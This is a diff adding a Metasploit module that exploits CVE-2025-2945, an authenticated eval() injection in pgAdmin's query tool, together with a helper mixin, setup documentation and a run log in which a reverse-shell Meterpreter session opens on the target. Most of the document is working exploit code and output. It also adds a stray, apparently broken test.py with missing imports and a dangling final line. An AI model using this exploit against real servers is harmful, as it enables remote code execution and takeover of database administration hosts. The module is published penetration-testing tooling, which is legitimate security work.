pgAdmin Query Tool Authenticated RCE (CVE-2025-2945)

Author: jheysel-r7

documentation/modules/exploit/multi/http/pgadmin_query_tool_authenticated.md

@@ -0,0 +1,79 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a vulnerability in pgAdmin where an authenticated user can establish a connection to the query tool
+and send a specific payload in the query_commited POST parameter. This payload is directly executed via a Python eval()
+statement, resulting in remote code execution in versions prior to 9.2.
+
+To exploit this vulnerability, pgAdmin credentials are required. Additionally, in order to interact with the vulnerable
+SQL editor component, valid database credentials are necessary to initialize a session and obtain a transaction ID,
+which is required for the exploit.
+
+
+### Setup
+
+A pgAdmin Docker instance can be started using the following command:
+```bash
+docker run -d -p 8484:80 -e [email protected] -e PGADMIN_DEFAULT_PASSWORD=adminpassword --name pgadmin dpage/pgadmin4:9.0
+```
+A PostgreSQL database needs to be connected to the pgAdmin instance in order to exploit. The version of postgresql doesn't matter:
+```bash
+docker run -d \\n  -p 5432:5432 \\n  --name postgres \\n  -e POSTGRES_PASSWORD=mysecretpassword \\n  -e POSTGRES_USER=pgadminuser \\n  -e POSTGRES_DB=pgadmin \\n  postgres:latest
+```
+
+## Verification Steps
+1. Start msfconsole.
+1. Do: use exploit/multi/http/pgadmin_query_tool_authenticated.
+1. Set the RHOST, USERNAME, PASSWORD, DB_USER, DB_PASS AND DB_NAME options.
+1. Run the module.
+1. Receive a Meterpreter session as the pgAdmin user. 
+
+## Options
+
+### USERNAME
+The username for authentication (required).
+
+### PASSWORD
+The password for authentication (required).
+
+### DB_USER
+The database username to authenticate to the database with (required).
+
+### DB_PASS
+The password to authenticate to the database with (required).
+
+### DB_NAME
+The name of the database to target (required)
+
+### MAX_SERVER_ID
+The maximum number of Server IDs to try and connect to. This is used to determine the correct server ID for the exploit.
+A valid `sid` is required in order to connect to the query_tool in order to exploit. The default value is 10.
+
+## Scenarios
+### pgAdmin 4 v9.0
+```
+msf6 exploit(multi/http/pgadmin_query_tool_authenticated) > run db_name=postgres db_user=pgadminuser db_pass=mysecretpassword rhost=127.0.0.1 rport=8484 [email protected] password=adminpassword lhost=172.16.199.1 MAX_SERVER_ID=10 verbose=true
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. pgAdmin version 9.0.0 is affected
+[+] Successfully authenticated to pgAdmin
+[*] Trying server ID: 1
+[*] Trying server ID: 2
+[*] Trying server ID: 3
+[+] Successfully posted to sqleditor panel with transaction ID: 9377994 and sid: 3
+[+] Successfully initialized sqleditor
+[*] Exploiting the target...
+[*] Sending stage (24772 bytes) to 172.16.199.1
+[+] Received a 500 response from the exploit attempt, this is expected
+[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.1:62455) at 2025-04-09 17:05:17 -0700
+
+meterpreter > getuid
+Server username: pgadmin
+smeterpreter > sysinfo
+Computer     : e9b855f7cda2
+OS           : Linux 6.10.14-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Mar 20 16:36:58 UTC 2025
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter >
+```

lib/msf/core/exploit/pgadmin.rb

@@ -0,0 +1,74 @@
+# -*- coding: binary -*-
+
+#
+# This mixin provides helpers to interact with pgAdmin. It provides methods to:
+# - authenticate
+# - obtain the CSRF token,
+# - check the version of pgAdmin.
+#
+module Msf
+  module Exploit::PgAdmin
+    include Msf::Exploit::Remote::HttpClient
+
+    def get_version
+      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
+      return unless res&.code == 200
+
+      html_document = res.get_html_document
+      return unless html_document.xpath('//title').text == 'pgAdmin 4'
+
+      versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ }
+      return unless versioned_link
+
+      set_csrf_token_from_login_page(res)
+      Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}")
+    end
+
+    def check_version(patched_version)
+      version = get_version
+      return Msf::Exploit::CheckCode::Unknown('Unable to determine the target version') unless version
+      return Msf::Exploit::CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new(patched_version)
+
+      Msf::Exploit::CheckCode::Appears("pgAdmin version #{version} is affected")
+    end
+
+    def csrf_token
+      return @csrf_token if @csrf_token
+
+      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
+      set_csrf_token_from_login_page(res)
+      fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token
+      @csrf_token
+    end
+
+    def set_csrf_token_from_login_page(res)
+      if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/
+        @csrf_token = Regexp.last_match(1)
+      elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first)
+        @csrf_token = element['value']
+      end
+    end
+
+    def authenticate(username, password)
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'authenticate/login'),
+        'method' => 'POST',
+        'keep_cookies' => true,
+        'vars_post' => {
+          'csrf_token' => csrf_token,
+          'email' => username,
+          'password' => password,
+          'language' => 'en',
+          'internal_button' => 'Login'
+        }
+      })
+
+      unless res&.code == 302 && res&.headers&.[]('Location') != normalize_uri(target_uri.path, 'login')
+        fail_with(Msf::Exploit::Failure::NoAccess, 'Failed to authenticate to pgAdmin')
+      end
+
+      print_good('Successfully authenticated to pgAdmin')
+      res
+    end
+  end
+end

lib/msf_autoload.rb

@@ -301,7 +301,8 @@ def custom_inflections
       'teamcity' => 'TeamCity',
       'nist_sp_800_38f' => 'NIST_SP_800_38f',
       'nist_sp_800_108' => 'NIST_SP_800_108',
-      'pfsense' => 'PfSense'
+      'pfsense' => 'PfSense',
+      'pgadmin' => 'PgAdmin',
     }
   end
 

modules/exploits/multi/http/pgadmin_query_tool_authenticated.rb

@@ -0,0 +1,182 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PgAdmin
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pgAdmin Query Tool authenticated RCE (CVE-2025-2945)',
+        'Description' => %q{
+          This module exploits a vulnerability in pgAdmin where an authenticated user can establish a connection to the query tool
+          and send a specific payload in the query_commited POST parameter. This payload is directly executed via a Python eval()
+          statement, resulting in remote code execution in versions prior to 9.2.
+
+          To exploit this vulnerability, pgAdmin credentials are required. Additionally, in order to interact with the vulnerable
+          SQL editor component, valid database credentials are necessary to initialize a session and obtain a transaction ID,
+          which is required for the exploit.
+        },
+        'Author' => [
+          'pyozzi-toss', # Vulnerability discovery
+          'jheysel-r7'   # msf module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-2945'],
+        ],
+        'Platform' => ['python'],
+        'Arch' => [ ARCH_PYTHON],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-04-03',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [true, 'The username to authenticate to pgadmin with', '']),
+        OptString.new('PASSWORD', [true, 'The password to authenticate to pgadmin with', '']),
+        OptString.new('DB_USER', [true, 'The username to authenticate to the database with', '']),
+        OptString.new('DB_PASS', [true, 'The password to authenticate to the database with', '']),
+        OptString.new('DB_NAME', [true, 'The database to authenticate to', '']),
+        OptInt.new('MAX_SERVER_ID', [true, 'The maximum number of Server IDs to try and connect to.', 10]),
+      ]
+    )
+  end
+
+  def check
+    check_version('9.2')
+  end
+
+  # Return only the required URI encoded fields in order for the POST request to be successful
+  # @return [String] The URI encoded form data for the POST request
+  def get_post_data
+    URI.encode_www_form({
+      'title' => Faker::App.name.downcase,
+      'selectedNodeInfo' => {
+        'database' => {
+          'id' => Faker::App.name.downcase
+        }
+      }
+    })
+  end
+
+  def post_sqleditor_panel(trans_id, sgid, sid, did)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "/sqleditor/panel/#{trans_id}?is_query_tool=true&sgid=#{sgid}&sid=#{sid}&did=#{did}&database_name=#{datastore['DB_NAME']}"),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'X-pgA-CSRFToken' => csrf_token
+      },
+      'data' => get_post_data
+    })
+
+    unless res&.code == 200
+      errmsg = res&.get_json_document&.dig('errormsg') || 'unknown error'
+      fail_with(Failure::UnexpectedReply, "POST request to sqleditor panel failed: #{errmsg}")
+    end
+    print_good("Successfully posted to sqleditor panel with transaction ID: #{trans_id} and sid: #{sid}")
+  end
+
+  def post_initialize_sqleditor(trans_id, sgid, sid, did)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "/sqleditor/initialize/sqleditor/#{trans_id}/#{sgid}/#{sid}/#{did}"),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => 'application/json',
+      'headers' => { 'X-pgA-CSRFToken' => csrf_token },
+      'data' => {
+        'user' => datastore['DB_USER'],
+        'password' => datastore['DB_PASS'],
+        'role' => '',
+        'dbname' => datastore['DB_NAME']
+      }.to_json
+    })
+
+    unless res&.code == 200
+      errmsg = res&.get_json_document&.dig('result', 'errmsg') || 'unknown error'
+      fail_with(Failure::UnexpectedReply, "Failed to initialize sqleditor: #{errmsg}")
+    end
+
+    print_good('Successfully initialized sqleditor')
+  end
+
+  def find_valid_server_id(sgid)
+    (1..datastore['MAX_SERVER_ID']).each do |sid|
+      vprint_status("Trying server ID: #{sid}")
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, "/sqleditor/get_server_connection/#{sgid}/#{sid}"),
+        'method' => 'GET',
+        'keep_cookies' => true,
+        'ctype' => 'application/x-www-form-urlencoded',
+        'headers' => {
+          'X-pgA-CSRFToken' => csrf_token
+        }
+      })
+      if res&.get_json_document&.dig('data', 'status')
+        return sid
+      end
+    end
+    fail_with(Failure::NoTarget, 'Failed to find a valid server ID, try increasing MAX_SERVER_ID')
+  end
+
+  # In order to interact with the vulnerable component, the SQL editor, we need to initialize a session and a valid
+  # transaction ID. This is done by sending a POST request to the sqleditor/panel endpoint with the necessary parameters
+  # @return [String] The transaction ID for the SQL editor
+  def sqleditor_init(trans_id)
+    sgid = rand(1..10)
+    did = rand(10000..99999)
+    sid = find_valid_server_id(sgid)
+    post_sqleditor_panel(trans_id, sgid, sid, did)
+    post_initialize_sqleditor(trans_id, sgid, sid, did)
+  end
+
+  def exploit
+    authenticate(datastore['USERNAME'], datastore['PASSWORD'])
+    trans_id = rand(1_000_000..9_999_999)
+    sqleditor_init(trans_id)
+
+    print_status('Exploiting the target...')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "/sqleditor/query_tool/download/#{trans_id}"),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'Referer' => "http://#{datastore['RHOST']}:#{datastore['RPORT']}/sqleditor/panel/#{trans_id}?is_query_tool=true",
+        'X-Pga-Csrftoken' => csrf_token
+      },
+      'data' => {
+        'query_commited' => payload.encoded
+      }.to_json
+    })
+    print_error('No response received from exploit attempt') unless res
+    print_good('Received a 500 response from the exploit attempt, this is expected') if res&.code == 500
+    print_error("Received an unexpected response code from the exploit attempt: #{res&.code}") if res&.code != 500
+  end
+end

test.py

@@ -0,0 +1,35 @@
+from pgadmin.utils.ajax import make_json_response
+from pgadmin.tools.sqleditor.utils.start_running_query import StartRunningQuery
+from pgadmin.tools.sqleditor import check_transaction_status
+
+def start_query_tool_session():
+    trans_id = str(secrets.choice(range(1, 9999999)))
+    session_obj = {}  # Initialize session object
+    trans_obj = {}  # Initialize transaction object
+
+    # Save transaction in session
+    StartRunningQuery.save_transaction_in_session(session_obj, trans_id, trans_obj)
+    return trans_id
+
+
+def execute_query_with_trans_id(trans_id, sql):
+    # Retrieve session information
+    session_obj = StartRunningQuery.retrieve_session_information(session, trans_id)
+    
+    if isinstance(session_obj, Response):
+        return session_obj
+
+    trans_obj = pickle.loads(session_obj['command_obj'])
+    conn = get_connection(trans_obj.sid)  # Function to get connection
+
+    # Execute the query
+    conn.execute_async(sql)
+
+def check_trans_status(trans_id):
+    status, error_msg, conn, trans_obj, session_obj = check_transaction_status(trans_id)
+    if not status:
+        return error_msg
+    return conn.transaction_status()
+
+
+start_query_tool_session